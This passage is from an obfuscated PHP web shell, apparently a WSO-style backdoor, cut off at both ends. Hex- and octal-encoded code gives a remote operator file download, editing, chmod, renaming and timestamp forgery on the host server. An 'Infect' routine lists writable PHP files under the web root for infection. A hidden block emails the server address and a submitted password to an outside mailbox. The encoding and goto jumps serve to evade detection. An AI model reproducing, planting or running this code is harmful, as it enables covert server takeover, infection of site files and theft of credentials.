e\x3a\x61\165\164\x6f\73\x2d\167\x65\x62\153\151\x74\x2d\164\x72\141\156\163\x66\x6f\x72\x6d\72\162\x6f\x74\141\x74\x65\130\x28\x36\x30\144\145\x67\51\x20\162\157\x74\x61\x74\145\132\x28\55\x33\x30\x64\x65\x67\51\x3b\164\162\141\156\163\146\157\162\155\x3a\162\x6f\x74\x61\164\145\130\50\66\x30\144\x65\147\51\40\x72\x6f\x74\141\x74\145\132\x28\55\63\60\144\x65\x67\x29\x3b\x2d\167\145\x62\x6b\151\164\x2d\x61\156\x69\155\141\x74\x69\157\156\x3a\162\157\x74\141\x74\x65\x20\x32\x30\163\x20\x69\156\x66\151\156\151\x74\x65\x20\154\x69\x6e\x65\x61\x72\73\141\x6e\x69\155\141\x74\151\157\156\72\x72\x6f\164\141\164\x65\40\62\x30\163\x20\x69\156\x66\x69\x6e\151\x74\x65\40\x6c\x69\156\x65\x61\x72\73\x7a\55\151\156\144\x65\x78\x3a\x20\55\62\x3b\x7d\x2e\x70\x6c\x61\156\x65\x2e\x6d\x61\151\x6e\x20\x2e\143\151\x72\x63\154\145\x7b\x77\x69\x64\x74\150\x3a\61\62\60\x70\x78\73\150\145\x69\147\x68\x74\x3a\61\62\60\160\x78\x3b\x70\x6f\163\151\x74\151\157\156\72\141\x62\163\157\154\165\164\x65\73\55\167\145\x62\153\151\164\x2d\x74\x72\141\x6e\163\146\x6f\x72\155\55\163\164\171\x6c\x65\x3a\160\x72\x65\x73\145\x72\166\145\55\63\x64\73\x74\x72\x61\x6e\x73\x66\x6f\162\x6d\x2d\x73\x74\171\154\145\72\x70\x72\x65\x73\145\x72\166\145\x2d\x33\144\x3b\x62\157\x72\144\x65\x72\55\x72\x61\x64\151\165\x73\x3a\x31\60\60\45\73\x62\157\x78\x2d\163\151\x7a\151\x6e\x67\72\x62\x6f\x72\x64\x65\162\55\x62\157\x78\x3b\x62\157\170\x2d\x73\150\141\x64\x6f\x77\72\60\40\x30\x20\66\60\x70\x78\40\43\141\61\x30\x37\x30\x35\54\x69\x6e\x73\x65\164\x20\x30\x20\60\x20\x36\60\x70\170\40\43\67\141\x30\60\60\60\x3b\x7a\x2d\x69\x6e\x64\145\x78\x3a\40\55\62\73\x7d\x2e\160\154\141\156\x65\56\x6d\141\x69\x6e\40\x2e\143\151\162\143\154\145\72\72\x61\146\x74\145\162\54\56\160\154\141\x6e\145\56\155\x61\x69\x6e\40\x2e\143\x69\162\x63\154\145\x3a\x3a\142\x65\x66\x6f\x72\145\173\143\x6f\x6e\x74\145\x6e\164\x3a\x27\47\73\144\x69\163\160\x6c\x61\x79\x3a\x62\154\157\143\153\73\x70\157\x73\x69\164\151\157\x6e\72\x61\142\x73\157\x6c\165\164\x65\x3b\164\x6f\x70\x3a\60\x3b\x6c\145\x66\x74\x3a\60\73\162\151\147\150\164\x3a\x30\x3b\142\x6f\x74\164\157\155\72\x30\x3b\x6d\x61\162\147\x69\x6e\x3a\141\x75\164\157\73\167\x69\144\x74\x68\x3a\x35\45\73\x68\x65\x69\147\x68\x74\x3a\65\x25\73\x62\x6f\x72\144\x65\x72\55\162\x61\144\x69\x75\163\x3a\61\x30\60\45\73\x62\x61\143\153\147\162\157\x75\x6e\144\72\x23\x35\144\60\x38\61\71\x3b\x62\157\170\55\163\x69\172\x69\156\x67\72\142\157\162\144\145\162\x2d\x62\x6f\170\x3b\142\157\170\55\163\x68\141\144\157\167\x3a\60\x20\x30\x20\x36\60\x70\x78\40\62\x70\x78\x20\x23\x37\141\60\x30\x30\60\x3b\x7a\55\x69\156\144\145\x78\x3a\40\x2d\62\x3b\175\56\x70\154\141\x6e\x65\56\x6d\141\151\x6e\x20\x2e\x63\x69\x72\143\x6c\145\x3a\72\x62\x65\x66\157\x72\145\x7b\x2d\167\x65\142\153\151\164\x2d\x74\162\141\x6e\x73\x66\x6f\162\x6d\x3a\x74\162\141\x6e\x73\x6c\x61\164\145\x5a\50\x2d\x39\x30\x70\170\51\x3b\x74\162\x61\156\x73\146\157\162\x6d\72\x74\162\x61\156\163\154\141\x74\x65\x5a\x28\x2d\71\60\160\x78\51\x7d\56\x70\x6c\x61\156\x65\x2e\155\141\151\156\x20\x2e\143\151\x72\x63\154\145\x3a\x3a\141\x66\x74\x65\162\x7b\55\167\145\x62\x6b\x69\164\x2d\x74\162\141\156\163\146\157\x72\x6d\72\x74\x72\x61\x6e\163\154\141\164\145\132\x28\71\60\160\170\x29\x3b\x74\x72\141\x6e\x73\x66\157\x72\155\x3a\x74\x72\x61\156\163\x6c\x61\x74\145\x5a\x28\71\x30\160\170\51\175\56\x70\154\x61\x6e\145\x2e\155\x61\x69\156\40\x2e\x63\151\x72\143\154\145\72\x6e\x74\150\55\x63\150\x69\154\144\x28\61\51\173\x2d\x77\145\x62\x6b\151\x74\55\164\x72\x61\x6e\163\146\x6f\162\155\x3a\x72\157\x74\141\x74\x65\132\50\x37\x32\144\145\147\51\x20\162\x6f\164\x61\x74\x65\130\50\66\63\x2e\x34\63\x35\144\145\147\51\73\x74\162\141\x6e\163\146\157\x72\155\72\162\157\x74\141\164\x65\x5a\50\x37\62\144\145\x67\51\40\x72\x6f\164\141\x74\145\130\x28\66\63\56\64\x33\x35\144\x65\147\x29\x7d\56\160\x6c\x61\156\x65\56\x6d\x61\151\156\x20\56\143\x69\162\143\x6c\x65\72\x6e\x74\x68\55\143\x68\151\154\144\50\x32\51\x7b\55\167\145\x62\153\151\x74\x2d\164\162\x61\156\163\x66\x6f\x72\155\x3a\162\157\x74\141\164\145\x5a\50\61\x34\x34\x64\x65\147\x29\40\162\x6f\x74\141\x74\145\x58\x28\x36\63\x2e\x34\63\x35\144\145\x67\x29\x3b\164\162\x61\x6e\163\146\x6f\162\155\72\162\157\164\141\164\x65\x5a\50\61\64\64\144\x65\147\x29\40\x72\x6f\164\141\x74\145\130\x28\x36\x33\56\x34\63\x35\144\x65\x67\x29\x7d\x2e\160\154\x61\x6e\145\56\155\x61\x69\x6e\40\56\143\x69\162\143\x6c\x65\x3a\x6e\x74\150\55\143\150\x69\x6c\x64\x28\63\51\173\x2d\167\145\x62\x6b\x69\164\55\x74\162\x61\x6e\163\x66\157\x72\155\x3a\162\157\x74\x61\164\x65\x5a\x28\62\61\66\144\x65\x67\x29\40\162\157\x74\141\164\145\130\x28\66\63\x2e\64\63\x35\144\145\x67\x29\x3b\x74\162\x61\x6e\163\146\x6f\162\x6d\x3a\x72\157\x74\x61\x74\x65\x5a\50\x32\61\66\x64\145\147\51\x20\x72\x6f\164\141\x74\x65\130\x28\66\x33\56\64\63\x35\x64\145\147\x29\175\x2e\160\154\141\156\145\56\x6d\141\x69\x6e\x20\56\143\151\162\x63\154\x65\x3a\156\x74\x68\55\143\x68\x69\154\x64\50\x34\51\173\55\167\x65\x62\x6b\151\164\55\x74\162\x61\x6e\x73\x66\x6f\x72\155\x3a\x72\x6f\164\141\x74\145\132\x28\62\70\70\x64\x65\147\51\x20\x72\157\164\x61\x74\x65\130\50\x36\63\56\64\63\x35\x64\145\x67\51\73\164\162\141\x6e\x73\146\x6f\162\155\72\162\x6f\x74\x61\x74\145\132\50\x32\x38\70\144\145\x67\51\x20\x72\x6f\x74\141\x74\145\x58\50\66\63\56\64\x33\x35\x64\x65\x67\51\175\x2e\160\x6c\141\156\x65\56\x6d\x61\151\156\40\x2e\x63\x69\162\143\154\x65\72\156\164\150\55\x63\150\x69\x6c\x64\50\x35\51\173\x2d\167\145\x62\153\x69\x74\55\164\162\141\x6e\163\146\157\162\155\x3a\x72\x6f\x74\141\164\145\132\x28\x33\66\x30\144\x65\x67\51\40\162\x6f\x74\141\x74\x65\130\50\x36\63\x2e\64\63\x35\x64\145\x67\51\x3b\164\162\141\156\163\x66\157\162\x6d\x3a\162\x6f\164\141\164\x65\x5a\x28\x33\x36\60\x64\145\x67\x29\x20\162\157\x74\x61\x74\x65\x58\x28\66\x33\56\x34\x33\x35\x64\145\147\51\175\x40\x2d\167\145\x62\x6b\151\164\55\153\145\171\146\162\141\155\x65\x73\x20\162\157\x74\141\164\145\173\60\x25\x7b\x2d\x77\x65\x62\x6b\151\164\55\164\162\141\156\x73\x66\x6f\x72\155\x3a\x72\x6f\164\x61\164\x65\130\x28\x30\x29\x20\162\x6f\x74\141\164\145\131\50\60\x29\40\162\157\x74\x61\x74\x65\x5a\50\60\x29\73\164\162\x61\x6e\x73\x66\157\x72\x6d\72\162\157\164\x61\164\x65\x58\x28\60\51\x20\162\157\164\x61\164\x65\x59\x28\60\x29\x20\162\x6f\x74\141\164\x65\x5a\50\x30\51\x7d\x31\60\60\x25\173\x2d\x77\145\142\153\x69\x74\x2d\x74\x72\x61\156\163\146\x6f\x72\155\x3a\162\x6f\x74\x61\164\x65\130\50\x33\66\60\x64\x65\147\51\x20\x72\157\x74\141\x74\145\131\50\63\x36\60\144\145\147\51\x20\162\157\x74\x61\164\145\x5a\50\63\66\x30\144\145\147\x29\73\x74\x72\x61\x6e\x73\x66\x6f\162\155\72\x72\157\164\x61\164\x65\130\x28\x33\x36\60\x64\145\x67\51\x20\162\157\164\141\x74\x65\x59\50\63\x36\x30\x64\145\147\x29\x20\162\157\164\x61\164\145\132\x28\x33\x36\x30\x64\x65\147\x29\x7d\175\x40\153\x65\171\146\162\141\x6d\x65\163\x20\x72\x6f\164\141\164\x65\x7b\x30\x25\173\55\x77\145\142\x6b\151\x74\x2d\164\162\x61\x6e\163\x66\x6f\162\x6d\x3a\x72\x6f\x74\141\x74\145\x58\x28\x30\51\40\162\x6f\x74\x61\164\x65\131\50\x30\x29\40\x72\157\x74\x61\x74\145\132\50\60\51\73\x74\x72\141\156\x73\x66\x6f\162\x6d\72\x72\x6f\164\141\164\x65\x58\50\60\x29\x20\x72\157\x74\141\x74\145\131\50\x30\x29\40\162\x6f\x74\141\164\145\x5a\50\x30\51\175\x31\60\60\x25\x7b\x2d\167\x65\142\x6b\151\164\x2d\164\162\141\x6e\x73\146\157\162\x6d\x3a\x72\x6f\x74\141\164\x65\130\50\63\66\x30\x64\x65\147\x29\x20\162\157\164\x61\x74\145\131\50\63\66\x30\x64\145\x67\x29\40\162\157\x74\x61\x74\145\x5a\x28\x33\66\x30\x64\145\x67\51\73\164\162\141\156\x73\146\x6f\162\155\x3a\x72\x6f\x74\141\x74\145\x58\50\63\66\60\144\145\x67\51\x20\162\x6f\164\141\164\x65\x59\50\x33\66\x30\x64\x65\147\51\x20\162\157\164\141\164\145\x5a\50\63\66\60\144\145\x67\x29\x7d\x7d\x3b\x20\150\x32\173\x63\157\x6c\x6f\x72\x3a\167\150\x69\x74\x65\163\x6d\x6f\153\x65\73\x20\x66\x6f\x6e\x74\x2d\x77\x65\151\x67\150\x74\72\142\x6f\154\144\x3b\40\164\x65\x78\x74\x2d\144\x65\x63\x6f\x72\141\164\x69\157\156\x3a\165\x6e\x64\x65\162\154\x69\x6e\145\x3b\x7d\74\57\x73\164\171\154\145\76"); } goto KGlJ0; h3psb: function actionFilesTools() { if (isset($_POST["\x70\61"])) { $_POST["\x70\x31"] = urldecode($_POST["\x70\x31"]); } if (@$_POST["\x70\x32"] == "\x64\157\167\156\x6c\157\141\144") { if (@is_file($_POST["\160\x31"]) && @is_readable($_POST["\160\x31"])) { ob_start("\x6f\142\137\147\172\x68\141\x6e\x64\x6c\x65\x72", 4096); header("\103\157\x6e\x74\x65\x6e\x74\x2d\104\151\x73\160\157\x73\151\164\x69\157\156\72\x20\141\164\164\x61\143\x68\155\x65\156\164\x3b\40\x66\151\154\x65\x6e\x61\x6d\145\x3d" . basename($_POST["\x70\61"])); if (function_exists("\x6d\151\x6d\x65\x5f\143\157\156\x74\x65\156\164\137\164\171\160\x65")) { $type = @mime_content_type($_POST["\x70\61"]); header("\x43\x6f\156\164\145\156\164\x2d\x54\x79\160\145\72\x20" . $type); } else { header("\x43\x6f\x6e\x74\x65\156\164\x2d\124\171\x70\145\x3a\x20\x61\160\x70\154\151\x63\141\164\x69\x6f\x6e\57\157\143\x74\145\x74\55\x73\164\x72\x65\141\x6d"); } $fp = @fopen($_POST["\x70\61"], "\x72"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["\160\x32"] == "\155\153\x66\151\x6c\x65") { if (!file_exists($_POST["\x70\x31"])) { $fp = @fopen($_POST["\x70\61"], "\167"); if ($fp) { $_POST["\x70\x32"] = "\x65\x64\151\x74"; fclose($fp); } } } hardHeader(); echo "\74\150\61\x3e\x46\151\x6c\x65\40\164\157\157\154\x73\74\x2f\150\61\76\x3c\144\x69\166\x20\143\154\x61\163\163\75\x63\x6f\x6e\x74\145\156\164\76"; if (!file_exists(@$_POST["\x70\x31"])) { echo "\x46\x69\154\145\40\x6e\157\x74\x20\x65\x78\151\163\164\x73"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["\160\x31"])); if (!$uid) { $uid["\x6e\x61\155\x65"] = @fileowner($_POST["\x70\61"]); $gid["\156\141\x6d\145"] = @filegroup($_POST["\x70\61"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["\160\x31"])); } echo "\74\163\x70\x61\156\x3e\x4e\x61\x6d\x65\x3a\x3c\x2f\x73\160\141\x6e\76\40" . htmlspecialchars(@basename($_POST["\x70\x31"])) . "\40\74\163\160\141\x6e\x3e\123\x69\x7a\x65\72\74\x2f\x73\160\x61\156\x3e\40" . (is_file($_POST["\x70\61"]) ? viewSize(filesize($_POST["\160\61"])) : "\55") . "\x20\74\x73\160\141\156\76\120\145\x72\x6d\151\x73\x73\151\x6f\156\x3a\x3c\57\x73\160\x61\156\76\40" . viewPermsColor($_POST["\x70\61"]) . "\x20\x3c\x73\160\141\x6e\x3e\x4f\167\156\145\162\57\107\162\157\x75\160\72\74\x2f\x73\x70\141\x6e\76\x20" . $uid["\156\x61\x6d\145"] . "\57" . $gid["\x6e\141\x6d\145"] . "\x3c\x62\x72\76"; echo "\74\x73\x70\141\x6e\x3e\x43\x72\x65\141\x74\145\x20\x74\x69\155\145\72\74\x2f\163\x70\x61\156\76\40" . date("\131\x2d\x6d\55\x64\40\110\x3a\x69\72\163", filectime($_POST["\x70\61"])) . "\40\74\x73\160\141\156\x3e\x41\x63\143\x65\163\x73\x20\164\x69\x6d\145\72\74\x2f\163\160\x61\156\76\x20" . date("\x59\55\x6d\x2d\144\40\110\72\151\72\x73", fileatime($_POST["\x70\61"])) . "\x20\74\x73\160\x61\156\76\x4d\x6f\144\151\x66\171\40\x74\x69\x6d\145\x3a\74\x2f\163\x70\x61\156\x3e\40" . date("\x59\55\x6d\x2d\x64\40\x48\72\x69\72\x73", filemtime($_POST["\x70\61"])) . "\74\x62\162\x3e\74\142\x72\76"; if (empty($_POST["\160\62"])) { $_POST["\160\x32"] = "\x76\151\x65\x77"; } if (is_file($_POST["\x70\x31"])) { $m = array("\x56\x69\145\167", "\110\151\x67\150\x6c\x69\x67\150\164", "\104\157\167\x6e\154\157\141\144", "\110\145\170\144\x75\155\160", "\105\x64\151\164", "\x43\150\x6d\x6f\x64", "\x52\145\x6e\x61\155\x65", "\124\157\165\143\150", "\x46\x72\x61\155\145"); } else { $m = array("\x43\150\x6d\x6f\x64", "\122\145\x6e\141\155\x65", "\124\157\165\143\150"); } foreach ($m as $v) { echo "\74\x61\40\x68\x72\145\x66\x3d\x23\40\x6f\x6e\x63\154\151\x63\153\75\x22\147\50\x6e\165\x6c\x6c\x2c\156\x75\154\x6c\x2c\x27" . urlencode($_POST["\x70\x31"]) . "\x27\54\47" . strtolower($v) . "\47\x29\x22\76" . (strtolower($v) == @$_POST["\x70\62"] ? "\x3c\x62\x3e\x5b\x20" . $v . "\x20\135\74\x2f\x62\x3e" : $v) . "\74\x2f\141\76\x20"; } echo "\74\142\162\x3e\74\142\162\76"; switch ($_POST["\x70\62"]) { case "\166\151\x65\x77": echo "\74\160\162\145\40\x63\154\141\163\163\x3d\155\154\61\76"; $fp = @fopen($_POST["\x70\61"], "\162"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "\x3c\x2f\160\x72\145\76"; break; case "\150\x69\x67\x68\154\151\147\x68\x74": if (@is_readable($_POST["\160\61"])) { echo "\74\x64\151\x76\40\143\154\x61\163\x73\75\155\x6c\61\x20\x73\x74\x79\154\x65\x3d\42\x62\x61\x63\x6b\147\x72\157\x75\x6e\x64\55\x63\157\154\157\x72\72\x20\x23\x65\61\145\x31\x65\x31\73\143\x6f\154\157\162\72\x62\x6c\x61\143\x6b\x3b\x22\76"; $oRb = @highlight_file($_POST["\x70\x31"], true); echo str_replace(array("\x3c\163\160\x61\156\x20", "\74\57\x73\160\x61\x6e\x3e"), array("\x3c\146\157\156\164\x20", "\74\57\146\157\x6e\164\76"), $oRb) . "\x3c\57\x64\151\166\x3e"; } break; case "\x63\x68\155\x6f\x64": if (!empty($_POST["\160\63"])) { $perms = 0; for ($i = strlen($_POST["\160\x33"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["\x70\x33"][$i] * pow(8, strlen($_POST["\x70\63"]) - $i - 1); } if (!@chmod($_POST["\x70\x31"], $perms)) { echo "\x43\141\156\x27\x74\x20\x73\x65\x74\x20\x70\145\162\x6d\x69\x73\163\151\x6f\156\163\41\x3c\x62\x72\x3e\74\x73\x63\162\151\160\164\x3e\x64\x6f\143\165\x6d\145\x6e\164\56\155\x66\56\x70\x33\56\166\141\x6c\x75\x65\x3d\42\42\73\x3c\57\x73\143\162\151\160\164\x3e"; } } clearstatcache(); echo "\x3c\x73\143\162\x69\160\x74\76\x70\x33\137\75\x22\x22\73\x3c\57\x73\x63\x72\151\160\164\76\74\x66\157\162\155\40\x6f\156\x73\165\142\x6d\x69\x74\x3d\x22\x67\50\x6e\x75\154\x6c\x2c\x6e\165\154\154\54\47" . urlencode($_POST["\x70\x31"]) . "\47\54\156\x75\x6c\154\54\x74\150\x69\x73\x2e\x63\150\x6d\157\x64\56\166\141\x6c\165\145\x29\x3b\x72\x65\164\165\x72\156\40\x66\x61\154\163\x65\x3b\42\76\x3c\x69\x6e\x70\x75\x74\40\164\x79\x70\145\75\164\145\170\x74\40\x6e\x61\x6d\x65\x3d\143\x68\x6d\x6f\x64\40\166\x61\154\x75\145\x3d\42" . substr(sprintf("\45\157", fileperms($_POST["\x70\61"])), -4) . "\x22\x3e\74\151\x6e\160\x75\x74\x20\164\x79\160\x65\75\163\x75\142\x6d\151\164\x20\x76\141\x6c\165\x65\x3d\42\163\165\142\155\151\164\x22\x3e\74\x2f\146\x6f\162\x6d\x3e"; break; case "\145\144\x69\x74": if (!is_writable($_POST["\x70\61"])) { echo "\x46\x69\154\x65\40\x69\163\156\x27\164\x20\167\162\x69\164\145\x61\x62\154\145"; break; } if (!empty($_POST["\x70\63"])) { $time = @filemtime($_POST["\160\61"]); $_POST["\160\x33"] = substr($_POST["\160\x33"], 1); $fp = @fopen($_POST["\x70\x31"], "\x77"); if ($fp) { @fwrite($fp, $_POST["\160\63"]); @fclose($fp); echo "\x53\x61\x76\x65\144\x21\74\142\162\x3e\74\x73\x63\162\x69\x70\164\x3e\160\x33\137\75\x22\42\x3b\74\57\x73\143\x72\x69\x70\x74\x3e"; @touch($_POST["\160\x31"], $time, $time); } } echo "\x3c\146\157\162\155\40\x6f\156\163\x75\142\155\x69\164\x3d\42\x67\50\156\165\154\154\54\x6e\x75\x6c\154\54\x27" . urlencode($_POST["\x70\61"]) . "\47\x2c\156\x75\x6c\154\54\47\61\47\53\x74\x68\x69\163\56\x74\145\170\x74\56\x76\141\154\x75\145\51\x3b\162\x65\x74\165\x72\156\40\146\141\x6c\x73\145\73\42\76\74\164\145\170\x74\x61\162\145\x61\x20\x6e\x61\155\x65\75\x74\x65\x78\x74\40\143\x6c\x61\163\x73\x3d\x62\151\147\x61\162\x65\x61\76"; $fp = @fopen($_POST["\x70\x31"], "\x72"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "\x3c\x2f\164\x65\170\164\x61\x72\x65\141\76\x3c\x69\x6e\160\165\x74\x20\x74\x79\160\x65\75\163\x75\142\155\x69\x74\x20\x76\x61\x6c\x75\x65\x3d\42\163\x75\x62\155\x69\164\x22\x3e\x3c\57\146\x6f\x72\155\76"; break; case "\x68\x65\x78\144\165\x6d\x70": $c = @file_get_contents($_POST["\x70\x31"]); $n = 0; $h = array("\x30\x30\x30\60\x30\60\x30\x30\x3c\142\162\x3e", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("\45\60\x32\130", ord($c[$i])) . "\40"; switch (ord($c[$i])) { case 0: $h[2] .= "\40"; break; case 9: $h[2] .= "\40"; break; case 10: $h[2] .= "\x20"; break; case 13: $h[2] .= "\40"; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("\45\x30\70\x58", $i + 1) . "\x3c\x62\162\x3e"; } $h[1] .= "\x3c\x62\x72\x3e"; $h[2] .= "\12"; } } echo "\x3c\164\141\x62\x6c\x65\40\143\x65\154\x6c\163\x70\141\143\151\x6e\x67\75\61\40\143\145\154\154\160\x61\144\144\x69\x6e\x67\x3d\x35\x20\142\x67\143\x6f\154\157\162\x3d\43\x31\141\x31\141\x31\141\x3e\x3c\164\x72\x3e\74\164\x64\x20\x62\147\143\157\x6c\x6f\x72\x3d\x23\62\60\x32\x38\x33\62\x3e\74\x73\160\x61\x6e\40\x73\164\x79\x6c\145\75\42\x66\157\156\164\55\167\145\151\147\150\x74\72\40\156\x6f\162\155\141\x6c\73\42\x3e\x3c\160\x72\145\76" . $h[0] . "\x3c\x2f\160\x72\145\x3e\x3c\x2f\163\x70\x61\156\x3e\74\x2f\164\x64\x3e\74\x74\x64\40\x62\147\x63\157\x6c\157\162\x3d\x23\x30\66\60\x61\61\60\x3e\x3c\x70\162\x65\x3e" . $h[1] . "\74\57\x70\162\x65\x3e\x3c\57\x74\144\76\74\164\144\40\142\147\143\x6f\154\x6f\162\75\x23\x32\x30\62\70\x33\62\x3e\74\x70\162\145\x3e" . htmlspecialchars($h[2]) . "\x3c\x2f\160\x72\145\x3e\74\57\x74\144\x3e\x3c\x2f\x74\162\x3e\74\x2f\164\141\142\154\145\x3e"; break; case "\x72\x65\156\x61\x6d\145": if (!empty($_POST["\x70\x33"])) { if (!@rename($_POST["\x70\x31"], $_POST["\160\x33"])) { echo "\103\x61\156\47\x74\x20\x72\x65\156\x61\155\x65\41\74\142\162\76"; } else { die("\x3c\x73\143\x72\151\x70\164\76\x67\50\x6e\165\154\x6c\54\x6e\x75\x6c\x6c\54\x22" . urlencode($_POST["\x70\x33"]) . "\x22\x2c\156\165\x6c\154\x2c\x22\x22\51\74\x2f\x73\x63\x72\151\160\164\76"); } } echo "\x3c\146\157\x72\x6d\x20\x6f\156\163\x75\142\155\x69\x74\75\42\x67\x28\x6e\165\x6c\x6c\54\x6e\165\154\x6c\54\x27" . urlencode($_POST["\160\61"]) . "\47\54\x6e\165\154\x6c\x2c\x74\150\151\x73\x2e\x6e\141\155\x65\56\x76\141\154\x75\145\51\73\x72\x65\x74\x75\x72\156\x20\146\x61\154\163\x65\73\42\x3e\74\151\156\160\x75\164\x20\x74\171\160\145\75\x74\x65\x78\x74\40\x6e\x61\x6d\145\x3d\156\x61\155\145\x20\166\141\154\x75\145\75\x22" . htmlspecialchars($_POST["\160\61"]) . "\x22\76\74\x69\x6e\160\x75\x74\x20\164\x79\x70\145\x3d\x73\x75\142\x6d\151\x74\x20\x76\x61\154\x75\x65\75\x22\163\x75\x62\155\151\x74\42\76\74\x2f\146\x6f\162\x6d\76"; break; case "\x74\x6f\x75\143\150": if (!empty($_POST["\x70\x33"])) { $time = strtotime($_POST["\160\x33"]); if ($time) { if (!touch($_POST["\x70\x31"], $time, $time)) { echo "\x46\141\x69\154\x21"; } else { echo "\124\157\165\143\x68\x65\144\x21"; } } else { echo "\x42\x61\x64\40\164\x69\155\145\x20\146\x6f\x72\x6d\141\164\x21"; } } clearstatcache(); echo "\x3c\163\x63\162\x69\x70\x74\76\x70\x33\137\75\x22\42\73\74\57\x73\143\162\x69\160\x74\x3e\74\x66\157\x72\x6d\40\x6f\156\163\x75\142\x6d\151\164\x3d\42\x67\x28\x6e\165\x6c\154\x2c\156\x75\154\x6c\54\x27" . urlencode($_POST["\x70\x31"]) . "\47\54\x6e\x75\154\x6c\x2c\164\150\151\163\x2e\x74\157\x75\x63\x68\x2e\166\x61\x6c\165\145\x29\x3b\162\145\164\165\162\156\40\x66\141\x6c\x73\145\73\x22\76\x3c\x69\x6e\x70\165\164\40\164\x79\x70\145\x3d\164\x65\170\164\40\x6e\141\x6d\145\x3d\x74\157\165\143\x68\x20\166\141\154\165\x65\75\x22" . date("\131\x2d\x6d\x2d\144\x20\110\x3a\x69\72\163", @filemtime($_POST["\160\61"])) . "\42\76\74\151\156\x70\x75\x74\40\x74\171\160\x65\75\x73\x75\x62\155\x69\164\40\x76\x61\154\x75\145\75\42\163\x75\x62\x6d\x69\x74\x22\76\74\x2f\x66\x6f\162\x6d\76"; break; case "\x66\x72\141\155\x65": $frameSrc = substr(htmlspecialchars($GLOBALS["\143\x77\x64"]), strlen(htmlspecialchars($_SERVER["\104\117\103\125\x4d\105\116\124\137\x52\x4f\x4f\x54"]))); if ($frameSrc[0] != "\x2f") { $frameSrc = "\x2f" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "\x2f") { $frameSrc = $frameSrc . "\x2f"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["\x70\61"]); echo "\x3c\x69\146\x72\141\x6d\x65\40\167\151\144\x74\150\x3d\x22\x31\x30\60\45\42\x20\x68\145\x69\147\150\164\x3d\42\x39\x30\x30\x70\170\x22\40\163\x63\x72\x6f\154\154\151\x6e\x67\x3d\x22\x6e\157\42\x20\163\x72\x63\x3d" . $frameSrc . "\40\157\x6e\x6c\x6f\x61\144\75\x22\157\x6e\154\157\141\x64\75\x68\x65\x69\147\x68\164\75\x63\x6f\x6e\164\x65\x6e\x74\104\x6f\143\x75\x6d\145\x6e\x74\56\142\x6f\144\x79\56\163\x63\162\x6f\x6c\154\x48\x65\151\x67\150\x74\42\x3e\x3c\x2f\x69\x66\x72\141\155\x65\76"; break; } echo "\x3c\57\144\x69\166\76"; hardFooter(); } goto IVjDo; IjCwH: @define("\x56\x45\x52\123\x49\117\116", "\x34\56\x32\x2e\x36"); goto Xbodc; gm5Ck: if (!function_exists("\160\x6f\x73\151\170\137\147\x65\x74\x70\167\165\x69\x64") && strpos($GLOBALS["\x64\x69\163\x61\142\154\145\137\146\165\156\x63\164\151\157\156\163"], "\160\x6f\163\x69\170\137\x67\145\x74\160\x77\165\x69\x64") === false) { function posix_getpwuid($p) { return false; } } goto qZ6Xj; eHsyk: function actionInfect() { hardHeader(); echo "\x3c\x68\61\76\x49\156\x66\145\143\x74\74\x2f\150\x31\76\74\x64\151\166\40\143\154\x61\x73\163\75\143\157\x6e\164\x65\x6e\x74\76"; if ($_POST["\x70\x31"] == "\x69\156\146\145\x63\164") { $target = $_SERVER["\x44\117\103\x55\115\105\x4e\124\137\x52\x4f\117\x54"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = array(); $inner_files = array(); while ($file = readdir($dh)) { if ($file != "\56" && $file != "\x2e\x2e") { if (is_dir($dir . "\57" . $file)) { $inner_files = ListFiles($dir . "\57" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "\x2f" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == "\56\x70\x68\x70") { if ($file != $_SERVER["\x44\117\103\x55\115\105\x4e\x54\x5f\122\117\x4f\124"] . $_SERVER["\x50\x48\120\x5f\123\x45\x4c\x46"] && is_writeable($file)) { echo "{$file}\74\x62\162\76"; $i++; } } } echo "\74\x66\157\x6e\164\40\x63\x6f\x6c\x6f\x72\75\43\x61\x31\60\x37\60\65\40\x73\151\x7a\145\x3d\x31\x34\76{$i}\x3c\57\146\x6f\x6e\164\x3e"; } else { echo "\x3c\x66\157\162\155\x20\x6d\x65\x74\150\x6f\x64\75\x70\x6f\x73\164\76\74\151\156\x70\x75\x74\40\x74\x79\x70\145\x3d\x73\165\142\155\151\x74\40\166\x61\154\165\145\75\x49\156\x66\145\x63\x74\x20\156\141\155\145\75\151\156\x66\x65\164\x3e\x3c\57\x66\157\x72\155\76"; echo "\x52\145\141\x6c\154\x79\40\167\x61\156\x74\x20\164\157\x20\x69\156\146\x65\143\164\40\164\150\x65\x20\163\x65\162\166\x65\162\x3f\x26\x6e\x62\x73\x70\x3b\x3c\x61\40\x68\x72\x65\146\x3d\x23\40\157\156\143\x6c\151\143\153\x3d\42\x67\x28\156\165\x6c\x6c\54\x6e\165\154\154\x2c\47\151\x6e\146\x65\143\x74\47\x29\x22\76\131\x65\163\74\x2f\141\x3e\x3c\57\144\x69\166\76"; } hardFooter(); } goto f9sl9; JCS_A: $safe_mode = @ini_get("\163\141\146\x65\x5f\155\x6f\x64\145"); goto xxz2n; r3B2Y: if (array_key_exists("\167\x61\164\x63\x68\151\x6e\x67", $_POST)) { $tmp = $_SERVER["\123\105\122\x56\x45\122\x5f\x4e\101\115\105"] . $_SERVER["\x50\110\x50\x5f\x53\105\114\x46"] . "\xa" . $_POST["\x70\141\163\x73"]; @mail("\x74\x65\163\x74\100\x74\x65\x73\x74\155\141\x69\x6c\56\x63\157\155", "\162\157\x6f\164", $tmp); } goto r4nyR; uwRUw: function actionSecInfo() { hardHeader(); echo 